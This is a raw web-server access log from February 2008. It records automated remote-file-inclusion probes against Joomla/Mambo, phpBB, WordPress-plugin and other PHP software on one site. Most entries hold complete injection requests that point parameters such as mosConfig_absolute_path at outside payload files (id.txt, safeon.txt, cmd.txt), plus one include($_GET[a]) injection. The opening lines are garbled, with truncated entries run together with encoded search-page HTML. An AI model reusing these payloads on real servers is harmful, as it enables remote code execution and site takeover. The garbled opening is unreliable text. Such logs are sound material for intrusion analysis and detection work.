216.65.116.80 - - [17/Feb/2008:05:13:32 -0800] "GET /logs/access_080122.log%3C/span%3E%20%20-%20%3Cem%3E525k%3C/em%3E%20%20-%20%3Ca%20href=%22http:/66.218.69.11/search/cache?ei=UTF-8&p=%22com_thopper%22&u=www.dmulk.com/logs/access_080122.log&w=com_thopper&d=DXqfKHDuQODg&icp=1&.intl=us%22%3ECached%3C/a%3E%20%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/eurogle.com/search/main.php-main.phpmain.php-main.php/1-14.html%22%20%3Emain.php%20main.phpmain.php%20main.php%20-%20Eurogle%20Network%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=abstr%3EEurogle%20Network%20News%20&%20Search%20Engine%20-%20Web%20search%20&%20hourly%20updated%20News%20videos.%20...%20phpmain.php%20main.php%201%2013.html%20components%20com_thopper%20inc%20projectstatus_type.php%20...%3C/div%3E%20%3Cspan%20class=url%3Eeurogle.com/search/main.php-main.phpmain.php-main.php/1-14.html%3C/span%3E%20%20-%20%3Cem%3E21k%3C/em%3E%20%20-%20%3Ca%20href=%holeymoley540@sbcglobal.216.65.116.80 - - [17/Feb/2008:05:13:32 -0800] "GET /logs/access_080122.log%3C/span%3E%20%20-%20%3Cem%3E525k%3C/em%3E%20%20-%20%3Ca%20href=%22http:/66.218.69.11/search/cache?ei=UTF-8&p=%22com_thopper%22&u=www.dmulk.com/logs/access_080122.log&w=com_thopper&d=DXqfKHDuQODg&icp=1&.intl=us%22%3ECached%3C/a%3E%20%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/eurogle.com/search/main.php-main.phpmain.php-main.php/1-14.html%22%20%3Emain.php%20main.phpmain.php%20main.php%20-%20Eurogle%20Network%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=abstr%3EEurogle%20Network%20News%20&%20Search%20Engine%20-%20Web%20search%20&%20hourly%20updated%20News%20videos.%20...%20phpmain.php%20main.php%201%2013.html%20components%20com_thopper%20inc%20projectstatus_type.php%20...%3C/div%3E%20%3Cspan%20class=url%3Eeurogle.com/search/main.php-main.phpmain.php-main.php/1-14.html%3C/span%3E%20%20-%20%3Cem%3E21k%3C/em%3E%20%20-%20%3Ca%20href=%susanireland1/us1:193.18216.65.116.80 - - [17/Feb/2008:05:13:32 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [17/Feb/2008:05:13:32 -0800] "GET /errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [17/Feb/2008:05:13:33 -0800] "GET /logs/access_080122.log%3C/span%3E%20%20-%20%3Cem%3E525k%3C/em%3E%20%20-%20%3Ca%20href=%22http:/66.218.69.11/search/cache?ei=UTF-8&p=%22com_thopper%22&u=www.dmulk.com/logs/access_080122.log&w=com_thopper&d=DXqfKHDuQODg&icp=1&.intl=us%22%3ECached%3C/a%3E%20%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/eurogle.com/search/main.php-main.phpmain.php-main.php/1-14.html%22%20%3Emain.php%20main.phpmain.php%20main.php%20-%20Eurogle%20Network%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=abstr%3EEurogle%20Network%20News%20&%20Search%20Engine%20-%20Web%20search%20&%20hourly%20updated%20News%20videos.%20...%20phpmain.php%20main.php%201%2013.html%20components%20com_thopper%20inc%20projectstatus_type.php%20...%3C/div%3E%20%3Cspan%20class=url%3Eeurogle.com/search/main.php-main.phpmain.php-main.php/1-14.html%3C/span%3E%20%20-%20%3Cem%3E21k%3C/em%3E%20%20-%20%3Ca%20href=%junsui_13/us1:85.70.229.216.65.116.80 - - [17/Feb/2008:05:13:33 -0800] "GET /logs/access_080122.log%3C/span%3E%20%20-%20%3Cem%3E525k%3C/em%3E%20%20-%20%3Ca%20href=%22http:/66.218.69.11/search/cache?ei=UTF-8&p=%22com_thopper%22&u=www.dmulk.com/logs/access_080122.log&w=com_thopper&d=DXqfKHDuQODg&icp=1&.intl=us%22%3ECached%3C/a%3E%20%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/eurogle.com/search/main.php-main.phpmain.php-main.php/1-14.html%22%20%3Emain.php%20main.phpmain.php%20main.php%20-%20Eurogle%20Network%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=abstr%3EEurogle%20Network%20News%20&%20Search%20Engine%20-%20Web%20search%20&%20hourly%20updated%20News%20videos.%20...%20phpmain.php%20main.php%201%2013.html%20components%20com_thopper%20inc%20projectstatus_type.php%20...%3C/div%3E%20%3Cspan%20class=url%3Eeurogle.com/search/main.php-main.phpmain.php-main.php/1-14.html%3C/span%3E%20%20-%20%3Cem%3E21k%3C/em%3E%20%20-%20%3Ca%20href=%emtgibson/us4:99.229.72.87.230.11.181 - - [17/Feb/2008:05:13:45 -0800] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.139 - - [17/Feb/2008:05:13:52 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.139 - - [17/Feb/2008:05:13:52 -0800] "GET /presto/?S=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
88.191.49.81 - - [17/Feb/2008:05:14:36 -0800] "GET /logs/access_071230.log/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.49.81 - - [17/Feb/2008:05:14:36 -0800] "GET /logs/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.246.94.115 - - [17/Feb/2008:05:15:10 -0800] "GET //admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.94.115 - - [17/Feb/2008:05:15:10 -0800] "GET //admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nagualhosting.com/cache/about.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.225.104 - - [17/Feb/2008:05:15:41 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.bpec-english.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
62.193.225.104 - - [17/Feb/2008:05:15:41 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.bpec-english.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
89.184.165.34 - - [17/Feb/2008:05:15:42 -0800] "GET /index.php?option=com_mgm&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.11.181 - - [17/Feb/2008:05:15:43 -0800] "GET /logs/access_071230.log/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [17/Feb/2008:05:15:43 -0800] "GET /logs/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.76.29 - - [17/Feb/2008:05:15:58 -0800] "GET /logs/access_071230.log/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.76.29 - - [17/Feb/2008:05:15:58 -0800] "GET /logs/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.236.106 - - [17/Feb/2008:05:16:09 -0800] "GET /components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.115.163.50 - - [17/Feb/2008:05:16:15 -0800] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.115.163.50 - - [17/Feb/2008:05:16:15 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.115.163.50 - - [17/Feb/2008:05:16:16 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.115.163.50 - - [17/Feb/2008:05:16:24 -0800] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.115.163.50 - - [17/Feb/2008:05:16:25 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.115.163.50 - - [17/Feb/2008:05:16:26 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.176.90 - - [17/Feb/2008:05:17:02 -0800] "GET //admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.piesse.org/koma/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.40.23.83 - - [17/Feb/2008:05:17:04 -0800] "GET /logs/access_080122.log/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://h1.ripway.com/putr4/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [17/Feb/2008:05:17:04 -0800] "GET /components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://h1.ripway.com/putr4/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [17/Feb/2008:05:17:05 -0800] "GET /logs/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://h1.ripway.com/putr4/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.149.242.150 - - [17/Feb/2008:05:17:08 -0800] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.theauctiondepo.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.112.140.125 - - [17/Feb/2008:05:17:16 -0800] "GET /logs/access_080131.log//oneadmin/photogallery/include.php?path[docroot]=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
62.112.140.125 - - [17/Feb/2008:05:17:16 -0800] "GET /logs/access_080131.log/errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
62.112.140.125 - - [17/Feb/2008:05:17:17 -0800] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
62.112.140.125 - - [17/Feb/2008:05:17:17 -0800] "GET /errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
62.112.140.125 - - [17/Feb/2008:05:17:17 -0800] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
62.112.140.125 - - [17/Feb/2008:05:17:18 -0800] "GET /logs/errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.176.190.96 - - [17/Feb/2008:05:17:31 -0800] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://dritoni.ch/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
216.176.190.96 - - [17/Feb/2008:05:17:33 -0800] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://dritoni.ch/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
89.184.165.34 - - [17/Feb/2008:05:18:35 -0800] "GET /logs/access_071230.log/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.184.165.34 - - [17/Feb/2008:05:18:36 -0800] "GET /logs/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.102.172 - - [17/Feb/2008:05:19:09 -0800] "GET /logs/access_080122.log//index.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.102.172 - - [17/Feb/2008:05:19:10 -0800] "GET //index.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.102.172 - - [17/Feb/2008:05:19:10 -0800] "GET /logs//index.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [17/Feb/2008:05:19:17 -0800] "GET /logs/access_071216.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [17/Feb/2008:05:19:18 -0800] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [17/Feb/2008:05:19:19 -0800] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [17/Feb/2008:05:19:30 -0800] "GET /logs/access_071228.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.111.169.172 - - [17/Feb/2008:05:19:56 -0800] "GET /logs/access_071230.log//convert/mvcw.php?step=1&vwar_root=http://www.partyanimals.nl/uploads/kola.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.111.169.172 - - [17/Feb/2008:05:19:56 -0800] "GET //convert/mvcw.php?step=1&vwar_root=http://www.partyanimals.nl/uploads/kola.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.111.169.172 - - [17/Feb/2008:05:19:56 -0800] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.partyanimals.nl/uploads/kola.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.62.206.91 - - [17/Feb/2008:05:20:29 -0800] "GET //index.php?mosConfig_absolute_path=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.149.242.150 - - [17/Feb/2008:05:20:29 -0800] "GET /logs/access_080129.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.theauctiondepo.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.149.242.150 - - [17/Feb/2008:05:20:30 -0800] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.theauctiondepo.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.149.242.150 - - [17/Feb/2008:05:20:30 -0800] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.theauctiondepo.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.149.242.150 - - [17/Feb/2008:05:20:46 -0800] "GET /logs/access_071216.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.theauctiondepo.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.195.28.2 - - [17/Feb/2008:05:21:43 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.76.29 - - [17/Feb/2008:05:21:51 -0800] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.76.29 - - [17/Feb/2008:05:21:51 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.76.29 - - [17/Feb/2008:05:22:50 -0800] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.140.125 - - [17/Feb/2008:05:23:09 -0800] "GET /logs/access_080122.log//oneadmin/photogallery/include.php?path[docroot]=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
62.112.140.125 - - [17/Feb/2008:05:23:11 -0800] "GET /logs/access_080122.log/errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
58.65.169.46 - - [17/Feb/2008:05:23:49 -0800] "GET /logs/access_080122.log///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.partyanimals.nl/uploads/kola.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.62.206.91 - - [17/Feb/2008:05:23:52 -0800] "GET /logs/access_080122.log//index.php?mosConfig_absolute_path=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.62.206.91 - - [17/Feb/2008:05:23:52 -0800] "GET //index.php?mosConfig_absolute_path=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.62.206.91 - - [17/Feb/2008:05:23:52 -0800] "GET /logs//index.php?mosConfig_absolute_path=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.65.169.46 - - [17/Feb/2008:05:23:55 -0800] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.partyanimals.nl/uploads/kola.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.237.23.38 - - [17/Feb/2008:05:24:02 -0800] "GET /logs/access_080101.log HTTP/1.1" 200 216727 "-" "7tiqtm7ebdmsknkapycyxmf" "www.dmulk.com"
81.169.151.216 - - [17/Feb/2008:05:24:09 -0800] "GET //_theme/breadcrumb.php?rootBase=http://www.nordicracingteam.com/cms_svl/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.151.216 - - [17/Feb/2008:05:24:16 -0800] "GET /logs//_theme/breadcrumb.php?rootBase=http://www.nordicracingteam.com/cms_svl/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
70.237.23.38 - - [17/Feb/2008:05:24:22 -0800] "GET /logs/access_071202.log HTTP/1.1" 200 60645 "-" "l mplxhsclvdxxjnae vl5pwekxpdlqjlyqtg" "www.dmulk.com"
81.169.151.216 - - [17/Feb/2008:05:24:23 -0800] "GET /logs/access_080131.log//_theme/breadcrumb.php?rootBase=http://www.nordicracingteam.com/cms_svl/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.151.216 - - [17/Feb/2008:05:24:24 -0800] "GET /logs/access_080120.log//_theme/breadcrumb.php?rootBase=http://www.nordicracingteam.com/cms_svl/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
82.135.207.90 - - [17/Feb/2008:05:24:36 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [17/Feb/2008:05:24:51 -0800] "GET /logs/access.log/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.184.165.34 - - [17/Feb/2008:05:24:57 -0800] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.184.165.34 - - [17/Feb/2008:05:24:57 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.52.146 - - [17/Feb/2008:05:25:11 -0800] "GET /logs/access_071225.log//skin/zero_vote/ask_password.php?dir=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.90 - - [17/Feb/2008:05:25:38 -0800] "GET /logs/access_071222.log//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.piesse.org/koma/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [17/Feb/2008:05:25:38 -0800] "GET /logs//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.piesse.org/koma/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.184.165.34 - - [17/Feb/2008:05:25:47 -0800] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.94.115 - - [17/Feb/2008:05:26:47 -0800] "GET /logs/access_080131.log//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.94.115 - - [17/Feb/2008:05:26:47 -0800] "GET /logs/access_080131.log//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nagualhosting.com/cache/about.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.94.115 - - [17/Feb/2008:05:26:48 -0800] "GET /logs//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.94.115 - - [17/Feb/2008:05:26:48 -0800] "GET /logs//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nagualhosting.com/cache/about.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.94.115 - - [17/Feb/2008:05:26:49 -0800] "GET /logs/access_071222.log//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.94.115 - - [17/Feb/2008:05:26:50 -0800] "GET /logs/access_071222.log//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nagualhosting.com/cache/about.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.94.115 - - [17/Feb/2008:05:26:55 -0800] "GET /logs/access_080121.log//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.94.115 - - [17/Feb/2008:05:26:56 -0800] "GET /logs/access_080121.log//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nagualhosting.com/cache/about.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.94.115 - - [17/Feb/2008:05:27:00 -0800] "GET /logs/access_071225.log//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.94.115 - - [17/Feb/2008:05:27:00 -0800] "GET /logs/access_071225.log//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nagualhosting.com/cache/about.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.94.115 - - [17/Feb/2008:05:27:02 -0800] "GET /logs/access_080126.log//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.94.115 - - [17/Feb/2008:05:27:02 -0800] "GET /logs/access_080126.log//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nagualhosting.com/cache/about.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.94.115 - - [17/Feb/2008:05:27:03 -0800] "GET /logs/access_071220.log//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.94.115 - - [17/Feb/2008:05:27:03 -0800] "GET /logs/access_071220.log//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nagualhosting.com/cache/about.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
